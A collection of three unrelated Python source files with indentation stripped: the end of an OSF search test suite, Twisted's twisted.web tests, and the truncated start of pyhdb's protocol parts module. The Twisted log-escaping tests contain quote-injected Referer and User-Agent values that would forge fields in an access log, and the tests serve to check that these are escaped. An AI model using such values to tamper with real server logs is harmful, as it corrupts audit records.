def test_unreg_users_do_show_on_projects(self):
unreg = UnregUserFactory(fullname='Robert Paulson')
self.project = ProjectFactory(
title='Glamour Rock',
creator=unreg,
is_public=True,
)
results = query(unreg.fullname)['results']
assert_equal(len(results), 1)
def test_search_fullname(self):
# Searching for full name yields exactly one result.
contribs = search.search_contributor(self.name1)
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name2)
assert_equal(len(contribs['users']), 0)
def test_search_firstname(self):
# Searching for first name yields exactly one result.
contribs = search.search_contributor(self.name1.split(' ')[0])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name2.split(' ')[0])
assert_equal(len(contribs['users']), 0)
def test_search_partial(self):
# Searching for part of first name yields exactly one
# result.
contribs = search.search_contributor(self.name1.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name2.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 0)
def test_search_fullname_special_character(self):
# Searching for a fullname with a special character yields
# exactly one result.
contribs = search.search_contributor(self.name3)
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name4)
assert_equal(len(contribs['users']), 0)
def test_search_firstname_special_charcter(self):
# Searching for a first name with a special character yields
# exactly one result.
contribs = search.search_contributor(self.name3.split(' ')[0])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name4.split(' ')[0])
assert_equal(len(contribs['users']), 0)
def test_search_partial_special_character(self):
# Searching for a partial name with a special character yields
# exctly one result.
contribs = search.search_contributor(self.name3.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name4.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 0)
@requires_search
class TestProjectSearchResults(SearchTestCase):
def setUp(self):
super(TestProjectSearchResults, self).setUp()
self.user = UserFactory(usename='Doug Bogie')
self.singular = 'Spanish Inquisition'
self.plural = 'Spanish Inquisitions'
self.possessive = 'Spanish\'s Inquisition'
self.project_singular = ProjectFactory(
title=self.singular,
creator=self.user,
is_public=True,
)
self.project_plural = ProjectFactory(
title=self.plural,
creator=self.user,
is_public=True,
)
self.project_possessive = ProjectFactory(
title=self.possessive,
creator=self.user,
is_public=True,
)
self.project_unrelated = ProjectFactory(
title='Cardinal Richelieu',
creator=self.user,
is_public=True,
)
def test_singular_query(self):
# Verify searching for singular term includes singular,
# possessive and plural versions in results.
results = query(self.singular)['results']
assert_equal(len(results), 3)
def test_plural_query(self):
# Verify searching for singular term includes singular,
# possessive and plural versions in results.
results = query(self.plural)['results']
assert_equal(len(results), 3)
def test_possessive_query(self):
# Verify searching for possessive term includes singular,
# possessive and plural versions in results.
results = query(self.possessive)['results']
assert_equal(len(results), 3)
def job(**kwargs):
keys = [
'title',
'institution',
'department',
'location',
'startMonth',
'startYear',
'endMonth',
'endYear',
'ongoing',
]
job = {}
for key in keys:
if key[-5:] == 'Month':
job[key] = kwargs.get(key, 'December')
elif key[-4:] == 'Year':
job[key] = kwargs.get(key, '2000')
else:
job[key] = kwargs.get(key, 'test_{}'.format(key))
return job
class TestUserSearchResults(SearchTestCase):
def setUp(self):
super(TestUserSearchResults, self).setUp()
self.user_one = UserFactory(jobs=[job(institution='Oxford'),
job(institution='Star Fleet')],
fullname='Date Soong')
self.user_two = UserFactory(jobs=[job(institution='Grapes la Picard'),
job(institution='Star Fleet')],
fullname='Jean-Luc Picard')
self.user_three = UserFactory(jobs=[job(institution='Star Fleet'),
job(institution='Federation Medical')],
fullname='Beverly Crusher')
self.user_four = UserFactory(jobs=[job(institution='Star Fleet')],
fullname='William Riker')
self.user_five = UserFactory(jobs=[job(institution='Traveler intern'),
job(institution='Star Fleet Academy'),
job(institution='Star Fleet Intern')],
fullname='Wesley Crusher')
for i in range(25):
UserFactory(jobs=[job()])
self.current_starfleet = [
self.user_three,
self.user_four,
]
self.were_starfleet = [
self.user_one,
self.user_two,
self.user_three,
self.user_four,
self.user_five
]
@unittest.skip('Cannot guarentee always passes')
def test_current_job_first_in_results(self):
results = query_user('Star Fleet')['results']
result_names = [r['names']['fullname'] for r in results]
current_starfleet_names = [u.fullname for u in self.current_starfleet]
for name in result_names[:2]:
assert_in(name, current_starfleet_names)
def test_had_job_in_results(self):
results = query_user('Star Fleet')['results']
result_names = [r['names']['fullname'] for r in results]
were_starfleet_names = [u.fullname for u in self.were_starfleet]
for name in result_names:
assert_in(name, were_starfleet_names)
class TestSearchExceptions(OsfTestCase):
# Verify that the correct exception is thrown when the connection is lost
@classmethod
def setUpClass(cls):
logging.getLogger('website.project.model').setLevel(logging.CRITICAL)
super(TestSearchExceptions, cls).setUpClass()
if settings.SEARCH_ENGINE == 'elastic':
cls._es = search.search_engine.es
search.search_engine.es = None
@classmethod
def tearDownClass(cls):
super(TestSearchExceptions, cls).tearDownClass()
if settings.SEARCH_ENGINE == 'elastic':
search.search_engine.es = cls._es
def test_connection_error(self):
# Ensures that saving projects/users doesn't break as a result of connection errors
self.user = UserFactory(usename='Doug Bogie')
self.project = ProjectFactory(
title="Tom Sawyer",
creator=self.user,
is_public=True,
)
self.user.save()
self.project.save()
class TestSearchMigration(SearchTestCase):
# Verify that the correct indices are created/deleted during migration
@classmethod
def tearDownClass(cls):
super(TestSearchMigration, cls).tearDownClass()
search.create_index(settings.ELASTIC_INDEX)
def setUp(self):
super(TestSearchMigration, self).setUp()
self.es = search.search_engine.es
search.delete_index(settings.ELASTIC_INDEX)
search.create_index(settings.ELASTIC_INDEX)
self.user = UserFactory(fullname='David Bowie')
self.project = ProjectFactory(
title=settings.ELASTIC_INDEX,
creator=self.user,
is_public=True
)
def test_first_migration_no_delete(self):
migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)
def test_multiple_migrations_no_delete(self):
for n in xrange(1, 21):
migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
def test_first_migration_with_delete(self):
migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)
def test_multiple_migrations_with_delete(self):
for n in xrange(1, 21, 2):
migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n + 1)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
assert not var.get(settings.ELASTIC_INDEX + '_v{}'.format(n))
| |
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for various parts of L{twisted.web}.
"""
from cStringIO import StringIO
from zope.interface import implements
from zope.interface.verify import verifyObject
from twisted.trial import unittest
from twisted.internet import reactor
from twisted.internet.address import IPv4Address
from twisted.internet.defer import Deferred
from twisted.web import server, resource, util
from twisted.internet import defer, interfaces, task
from twisted.web import iweb, http, http_headers
from twisted.python import log
class DummyRequest:
"""
Represents a dummy or fake request.
@ivar _finishedDeferreds: C{None} or a C{list} of L{Deferreds} which will
be called back with C{None} when C{finish} is called or which will be
errbacked if C{processingFailed} is called.
@type headers: C{dict}
@ivar headers: A mapping of header name to header value for all request
headers.
@type outgoingHeaders: C{dict}
@ivar outgoingHeaders: A mapping of header name to header value for all
response headers.
@type responseCode: C{int}
@ivar responseCode: The response code which was passed to
C{setResponseCode}.
@type written: C{list} of C{str}
@ivar written: The bytes which have been written to the request.
"""
uri = 'http://dummy/'
method = 'GET'
client = None
def registerProducer(self, prod,s):
self.go = 1
while self.go:
prod.resumeProducing()
def unregisterProducer(self):
self.go = 0
def __init__(self, postpath, session=None):
self.sitepath = []
self.written = []
self.finished = 0
self.postpath = postpath
self.prepath = []
self.session = None
self.protoSession = session or server.Session(0, self)
self.args = {}
self.outgoingHeaders = {}
self.responseHeaders = http_headers.Headers()
self.responseCode = None
self.headers = {}
self._finishedDeferreds = []
def getHeader(self, name):
"""
Retrieve the value of a request header.
@type name: C{str}
@param name: The name of the request header for which to retrieve the
value. Header names are compared case-insensitively.
@rtype: C{str} or L{NoneType}
@return: The value of the specified request header.
"""
return self.headers.get(name.lower(), None)
def setHeader(self, name, value):
"""TODO: make this assert on write() if the header is content-length
"""
self.outgoingHeaders[name.lower()] = value
def getSession(self):
if self.session:
return self.session
assert not self.written, "Session cannot be requested after data has been written."
self.session = self.protoSession
return self.session
def render(self, resource):
"""
Render the given resource as a response to this request.
This implementation only handles a few of the most common behaviors of
resources. It can handle a render method that returns a string or
C{NOT_DONE_YET}. It doesn't know anything about the semantics of
request methods (eg HEAD) nor how to set any particular headers.
Basically, it's largely broken, but sufficient for some tests at least.
It should B{not} be expanded to do all the same stuff L{Request} does.
Instead, L{DummyRequest} should be phased out and L{Request} (or some
other real code factored in a different way) used.
"""
result = resource.render(self)
if result is server.NOT_DONE_YET:
return
self.write(result)
self.finish()
def write(self, data):
self.written.append(data)
def notifyFinish(self):
"""
Return a L{Deferred} which is called back with C{None} when the request
is finished. This will probably only work if you haven't called
C{finish} yet.
"""
finished = Deferred()
self._finishedDeferreds.append(finished)
return finished
def finish(self):
"""
Record that the request is finished and callback and L{Deferred}s
waiting for notification of this.
"""
self.finished = self.finished + 1
if self._finishedDeferreds is not None:
observers = self._finishedDeferreds
self._finishedDeferreds = None
for obs in observers:
obs.callback(None)
def processingFailed(self, reason):
"""
Errback and L{Deferreds} waiting for finish notification.
"""
if self._finishedDeferreds is not None:
observers = self._finishedDeferreds
self._finishedDeferreds = None
for obs in observers:
obs.errback(reason)
def addArg(self, name, value):
self.args[name] = [value]
def setResponseCode(self, code, message=None):
"""
Set the HTTP status response code, but takes care that this is called
before any data is written.
"""
assert not self.written, "Response code cannot be set after data has been written: %s." % "@@@@".join(self.written)
self.responseCode = code
self.responseMessage = message
def setLastModified(self, when):
assert not self.written, "Last-Modified cannot be set after data has been written: %s." % "@@@@".join(self.written)
def setETag(self, tag):
assert not self.written, "ETag cannot be set after data has been written: %s." % "@@@@".join(self.written)
def getClientIP(self):
"""
Return the IPv4 address of the client which made this request, if there
is one, otherwise C{None}.
"""
if isinstance(self.client, IPv4Address):
return self.client.host
return None
class ResourceTestCase(unittest.TestCase):
def testListEntities(self):
r = resource.Resource()
self.failUnlessEqual([], r.listEntities())
class SimpleResource(resource.Resource):
def render(self, request):
if http.CACHED in (request.setLastModified(10),
request.setETag('MatchingTag')):
return ''
else:
return "correct"
class DummyChannel:
class TCP:
port = 80
disconnected = False
def __init__(self):
self.written = StringIO()
self.producers = []
def getPeer(self):
return IPv4Address("TCP", '192.168.1.1', 12344)
def write(self, bytes):
assert isinstance(bytes, str)
self.written.write(bytes)
def writeSequence(self, iovec):
map(self.write, iovec)
def getHost(self):
return IPv4Address("TCP", '10.0.0.1', self.port)
def registerProducer(self, producer, streaming):
self.producers.append((producer, streaming))
def loseConnection(self):
self.disconnected = True
class SSL(TCP):
implements(interfaces.ISSLTransport)
site = server.Site(resource.Resource())
def __init__(self):
self.transport = self.TCP()
def requestDone(self, request):
pass
class SiteTest(unittest.TestCase):
def test_simplestSite(self):
"""
L{Site.getResourceFor} returns the C{""} child of the root resource it
is constructed with when processing a request for I{/}.
"""
sres1 = SimpleResource()
sres2 = SimpleResource()
sres1.putChild("",sres2)
site = server.Site(sres1)
self.assertIdentical(
site.getResourceFor(DummyRequest([''])),
sres2, "Got the wrong resource.")
class SessionTest(unittest.TestCase):
"""
Tests for L{server.Session}.
"""
def setUp(self):
"""
Create a site with one active session using a deterministic, easily
controlled clock.
"""
self.clock = task.Clock()
self.uid = 'unique'
self.site = server.Site(resource.Resource())
self.session = server.Session(self.site, self.uid, self.clock)
self.site.sessions[self.uid] = self.session
def test_defaultReactor(self):
"""
If not value is passed to L{server.Session.__init__}, the global
reactor is used.
"""
session = server.Session(server.Site(resource.Resource()), '123')
self.assertIdentical(session._reactor, reactor)
def test_startCheckingExpiration(self):
"""
L{server.Session.startCheckingExpiration} causes the session to expire
after L{server.Session.sessionTimeout} seconds without activity.
"""
self.session.startCheckingExpiration()
# Advance to almost the timeout - nothing should happen.
self.clock.advance(self.session.sessionTimeout - 1)
self.assertIn(self.uid, self.site.sessions)
# Advance to the timeout, the session should expire.
self.clock.advance(1)
self.assertNotIn(self.uid, self.site.sessions)
# There should be no calls left over, either.
self.assertFalse(self.clock.calls)
def test_expire(self):
"""
L{server.Session.expire} expires the session.
"""
self.session.expire()
# It should be gone from the session dictionary.
self.assertNotIn(self.uid, self.site.sessions)
# And there should be no pending delayed calls.
self.assertFalse(self.clock.calls)
def test_expireWhileChecking(self):
"""
L{server.Session.expire} expires the session even if the timeout call
isn't due yet.
"""
self.session.startCheckingExpiration()
self.test_expire()
def test_notifyOnExpire(self):
"""
A function registered with L{server.Session.notifyOnExpire} is called
when the session expires.
"""
callbackRan = [False]
def expired():
callbackRan[0] = True
self.session.notifyOnExpire(expired)
self.session.expire()
self.assertTrue(callbackRan[0])
def test_touch(self):
"""
L{server.Session.touch} updates L{server.Session.lastModified} and
delays session timeout.
"""
# Make sure it works before startCheckingExpiration
self.clock.advance(3)
self.session.touch()
self.assertEqual(self.session.lastModified, 3)
# And after startCheckingExpiration
self.session.startCheckingExpiration()
self.clock.advance(self.session.sessionTimeout - 1)
self.session.touch()
self.clock.advance(self.session.sessionTimeout - 1)
self.assertIn(self.uid, self.site.sessions)
# It should have advanced it by just sessionTimeout, no more.
self.clock.advance(1)
self.assertNotIn(self.uid, self.site.sessions)
def test_startCheckingExpirationParameterDeprecated(self):
"""
L{server.Session.startCheckingExpiration} emits a deprecation warning
if it is invoked with a parameter.
"""
self.session.startCheckingExpiration(123)
warnings = self.flushWarnings([
self.test_startCheckingExpirationParameterDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(warnings[0]['category'], DeprecationWarning)
self.assertEqual(
warnings[0]['message'],
"The lifetime parameter to startCheckingExpiration is deprecated "
"since Twisted 9.0. See Session.sessionTimeout instead.")
def test_checkExpiredDeprecated(self):
"""
L{server.Session.checkExpired} is deprecated.
"""
self.session.checkExpired()
warnings = self.flushWarnings([self.test_checkExpiredDeprecated])
self.assertEqual(warnings[0]['category'], DeprecationWarning)
self.assertEqual(
warnings[0]['message'],
"Session.checkExpired is deprecated since Twisted 9.0; sessions "
"check themselves now, you don't need to.")
self.assertEqual(len(warnings), 1)
# Conditional requests:
# If-None-Match, If-Modified-Since
# make conditional request:
# normal response if condition succeeds
# if condition fails:
# response code
# no body
def httpBody(whole):
return whole.split('\r\n\r\n', 1)[1]
def httpHeader(whole, key):
key = key.lower()
headers = whole.split('\r\n\r\n', 1)[0]
for header in headers.split('\r\n'):
if header.lower().startswith(key):
return header.split(':', 1)[1].strip()
return None
def httpCode(whole):
l1 = whole.split('\r\n', 1)[0]
return int(l1.split()[1])
class ConditionalTest(unittest.TestCase):
"""
web.server's handling of conditional requests for cache validation.
"""
# XXX: test web.distrib.
def setUp(self):
self.resrc = SimpleResource()
self.resrc.putChild('', self.resrc)
self.site = server.Site(self.resrc)
self.site = server.Site(self.resrc)
self.site.logFile = log.logfile
# HELLLLLLLLLLP! This harness is Very Ugly.
self.channel = self.site.buildProtocol(None)
self.transport = http.StringTransport()
self.transport.close = lambda *a, **kw: None
self.transport.disconnecting = lambda *a, **kw: 0
self.transport.getPeer = lambda *a, **kw: "peer"
self.transport.getHost = lambda *a, **kw: "host"
self.channel.makeConnection(self.transport)
for l in ["GET / HTTP/1.1",
"Accept: text/html"]:
self.channel.lineReceived(l)
def tearDown(self):
self.channel.connectionLost(None)
def _modifiedTest(self, modifiedSince):
"""
Given the value C{modifiedSince} for the I{If-Modified-Since}
header, verify that a response with a 200 code and the resource as
the body is returned.
"""
self.channel.lineReceived("If-Modified-Since: " + modifiedSince)
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.OK)
self.failUnlessEqual(httpBody(result), "correct")
def test_modified(self):
"""
If a request is made with an I{If-Modified-Since} header value with
a timestamp indicating a time before the last modification of the
requested resource, a 200 response is returned along with a response
body containing the resource.
"""
self._modifiedTest(http.datetimeToString(1))
def test_unmodified(self):
"""
If a request is made with an I{If-Modified-Since} header value with
a timestamp indicating a time after the last modification of the
request resource, a 304 response is returned along with an empty
response body.
"""
self.channel.lineReceived("If-Modified-Since: %s"
% http.datetimeToString(100))
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
self.failUnlessEqual(httpBody(result), "")
def test_invalidTimestamp(self):
"""
If a request is made with an I{If-Modified-Since} header value which
cannot be parsed, the header is treated as not having been present
and a normal 200 response is returned with a response body
containing the resource.
"""
self._modifiedTest("like, maybe a week ago, I guess?")
def test_invalidTimestampYear(self):
"""
If a request is made with an I{If-Modified-Since} header value which
contains a string in the year position which is not an integer, the
header is treated as not having been present and a normal 200
response is returned with a response body containing the resource.
"""
self._modifiedTest("Thu, 01 Jan blah 00:00:10 GMT")
def test_invalidTimestampTooLongAgo(self):
"""
If a request is made with an I{If-Modified-Since} header value which
contains a year before the epoch, the header is treated as not
having been present and a normal 200 response is returned with a
response body containing the resource.
"""
self._modifiedTest("Thu, 01 Jan 1899 00:00:10 GMT")
def test_invalidTimestampMonth(self):
"""
If a request is made with an I{If-Modified-Since} header value which
contains a string in the month position which is not a recognized
month abbreviation, the header is treated as not having been present
and a normal 200 response is returned with a response body
containing the resource.
"""
self._modifiedTest("Thu, 01 Blah 1970 00:00:10 GMT")
def test_etagMatchedNot(self):
"""If-None-Match ETag cache validator (positive)"""
self.channel.lineReceived("If-None-Match: unmatchedTag")
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.OK)
self.failUnlessEqual(httpBody(result), "correct")
def test_etagMatched(self):
"""If-None-Match ETag cache validator (negative)"""
self.channel.lineReceived("If-None-Match: MatchingTag")
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpHeader(result, "ETag"), "MatchingTag")
self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
self.failUnlessEqual(httpBody(result), "")
from twisted.web import google
class GoogleTestCase(unittest.TestCase):
def testCheckGoogle(self):
raise unittest.SkipTest("no violation of google ToS")
d = google.checkGoogle('site:www.twistedmatrix.com twisted')
d.addCallback(self.assertEquals, 'http://twistedmatrix.com/')
return d
class RequestTests(unittest.TestCase):
"""
Tests for the HTTP request class, L{server.Request}.
"""
def test_interface(self):
"""
L{server.Request} instances provide L{iweb.IRequest}.
"""
self.assertTrue(
verifyObject(iweb.IRequest, server.Request(DummyChannel(), True)))
def testChildLink(self):
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.childLink('baz'), 'bar/baz')
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar/', 'HTTP/1.0')
self.assertEqual(request.childLink('baz'), 'baz')
def testPrePathURLSimple(self):
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
request.setHost('example.com', 80)
self.assertEqual(request.prePathURL(), 'http://example.com/foo/bar')
def testPrePathURLNonDefault(self):
d = DummyChannel()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com:81/foo/bar')
def testPrePathURLSSLPort(self):
d = DummyChannel()
d.transport.port = 443
request = server.Request(d, 1)
request.setHost('example.com', 443)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com:443/foo/bar')
def testPrePathURLSSLPortAndSSL(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 443
request = server.Request(d, 1)
request.setHost('example.com', 443)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com/foo/bar')
def testPrePathURLHTTPPortAndSSL(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 80
request = server.Request(d, 1)
request.setHost('example.com', 80)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com:80/foo/bar')
def testPrePathURLSSLNonDefault(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com:81/foo/bar')
def testPrePathURLSetSSLHost(self):
d = DummyChannel()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('foo.com', 81, 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://foo.com:81/foo/bar')
def test_prePathURLQuoting(self):
"""
L{Request.prePathURL} quotes special characters in the URL segments to
preserve the original meaning.
"""
d = DummyChannel()
request = server.Request(d, 1)
request.setHost('example.com', 80)
request.gotLength(0)
request.requestReceived('GET', '/foo%2Fbar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com/foo%2Fbar')
class RootResource(resource.Resource):
isLeaf=0
def getChildWithDefault(self, name, request):
request.rememberRootURL()
return resource.Resource.getChildWithDefault(self, name, request)
def render(self, request):
return ''
class RememberURLTest(unittest.TestCase):
def createServer(self, r):
chan = DummyChannel()
chan.site = server.Site(r)
return chan
def testSimple(self):
r = resource.Resource()
r.isLeaf=0
rr = RootResource()
r.putChild('foo', rr)
rr.putChild('', rr)
rr.putChild('bar', resource.Resource())
chan = self.createServer(r)
for url in ['/foo/', '/foo/bar', '/foo/bar/baz', '/foo/bar/']:
request = server.Request(chan, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', url, 'HTTP/1.0')
self.assertEqual(request.getRootURL(), "http://example.com/foo")
def testRoot(self):
rr = RootResource()
rr.putChild('', rr)
rr.putChild('bar', resource.Resource())
chan = self.createServer(rr)
for url in ['/', '/bar', '/bar/baz', '/bar/']:
request = server.Request(chan, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', url, 'HTTP/1.0')
self.assertEqual(request.getRootURL(), "http://example.com/")
class NewRenderResource(resource.Resource):
def render_GET(self, request):
return "hi hi"
def render_HEH(self, request):
return "ho ho"
class NewRenderTestCase(unittest.TestCase):
def _getReq(self):
d = DummyChannel()
d.site.resource.putChild('newrender', NewRenderResource())
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
return request
def testGoodMethods(self):
req = self._getReq()
req.requestReceived('GET', '/newrender', 'HTTP/1.0')
self.assertEquals(req.transport.getvalue().splitlines()[-1], 'hi hi')
req = self._getReq()
req.requestReceived('HEH', '/newrender', 'HTTP/1.0')
self.assertEquals(req.transport.getvalue().splitlines()[-1], 'ho ho')
def testBadMethods(self):
req = self._getReq()
req.requestReceived('CONNECT', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 501)
req = self._getReq()
req.requestReceived('hlalauguG', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 501)
def testImplicitHead(self):
req = self._getReq()
req.requestReceived('HEAD', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 200)
self.assertEquals(-1, req.transport.getvalue().find('hi hi'))
class SDResource(resource.Resource):
def __init__(self,default):
self.default = default
def getChildWithDefault(self, name, request):
d = defer.succeed(self.default)
resource = util.DeferredResource(d)
return resource.getChildWithDefault(name, request)
class DeferredResourceTests(unittest.TestCase):
"""
Tests for L{DeferredResource}.
"""
def testDeferredResource(self):
r = resource.Resource()
r.isLeaf = 1
s = SDResource(r)
d = DummyRequest(['foo', 'bar', 'baz'])
resource.getChildForRequest(s, d)
self.assertEqual(d.postpath, ['bar', 'baz'])
def test_render(self):
"""
L{DeferredResource} uses the request object's C{render} method to
render the resource which is the result of the L{Deferred} being
handled.
"""
rendered = []
request = DummyRequest([])
request.render = rendered.append
result = resource.Resource()
deferredResource = util.DeferredResource(defer.succeed(result))
deferredResource.render(request)
self.assertEquals(rendered, [result])
class DummyRequestForLogTest(DummyRequest):
uri = '/dummy' # parent class uri has "http://", which doesn't really happen
code = 123
clientproto = 'HTTP/1.0'
sentLength = None
client = IPv4Address('TCP', '1.2.3.4', 12345)
class TestLogEscaping(unittest.TestCase):
def setUp(self):
self.site = http.HTTPFactory()
self.site.logFile = StringIO()
self.request = DummyRequestForLogTest(self.site, False)
def testSimple(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "-"\n')
def testMethodQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.method = 'G"T'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "G\\"T /dummy HTTP/1.0" 123 - "-" "-"\n')
def testRequestQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.uri='/dummy"withquote'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy\\"withquote HTTP/1.0" 123 - "-" "-"\n')
def testProtoQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.clientproto='HT"P/1.0'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HT\\"P/1.0" 123 - "-" "-"\n')
def testRefererQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.headers['referer'] = 'http://malicious" ".website.invalid'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "http://malicious\\" \\".website.invalid" "-"\n')
def testUserAgentQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.headers['user-agent'] = 'Malicious Web" Evil'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "Malicious Web\\" Evil"\n')
| |
# Copyright 2014, 2015 SAP SE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Enable absolute import, otherwise the 'types' module of stdlib will not be found (conflicts with pyhdb types.py)
from __future__ import absolute_import
import collections
import io
import struct
import logging
from collections import namedtuple
from weakref import WeakValueDictionary
from os import SEEK_SET, SEEK_CUR, SEEK_END
###
import pyhdb
from pyhdb.lib.stringlib import humanhexlify
from pyhdb.protocol import types
from pyhdb.protocol import constants
from pyhdb.protocol.types import by_type_code
from pyhdb.exceptions import InterfaceError, DatabaseError, DataError, IntegrityError
from pyhdb.compat import is_text, iter_range, with_metaclass, string_types, byte_type
from pyhdb.protocol.headers import ReadLobHeader, PartHeader, WriteLobHeader
from pyhdb.protocol.constants import parameter_direction
logger = logging.getLogger('pyhdb')
debug = logger.debug
PART_MAPPING = WeakValueDictionary()
class Fields(object):
@staticmethod
def pack_data(fields):
payload = struct.pack('<H', len(fields))
for field in fields:
if is_text(field):
field = field.encode('cesu-8')
size = len(field)
if size >= 250:
payload += b'\xFF' + struct.pack('H', size) + field
else:
payload += struct.pack('b', size) + field
return payload
@staticmethod
def unpack_data(payload):
length = struct.unpack('<H', payload.read(2))[0]
fields = []
for _ in iter_range(0, length):
size = payload.read(1)
if size == b"\xFF":
size = struct.unpack('H', payload.read(2))[0]
else:
size = struct.unpack('b', size)[0]
fields.append(payload.read(size))
return fields
class PartMeta(type):
"""
Meta class for part classes which also add them into PART_MAPPING.
"""
def __new__(mcs, name, bases, attrs):
part_class = super(PartMeta, mcs).__new__(mcs, name, bases, attrs)
if part_class.kind:
if not -128 <= part_class.kind <= 127:
raise InterfaceError("%s part kind must be between -128 and 127" % part_class.__name__)
# Register new part class is registry dictionary for later lookup:
PART_MAPPING[part_class.kind] = part_class
return part_class
class Part(with_metaclass(PartMeta, object)):
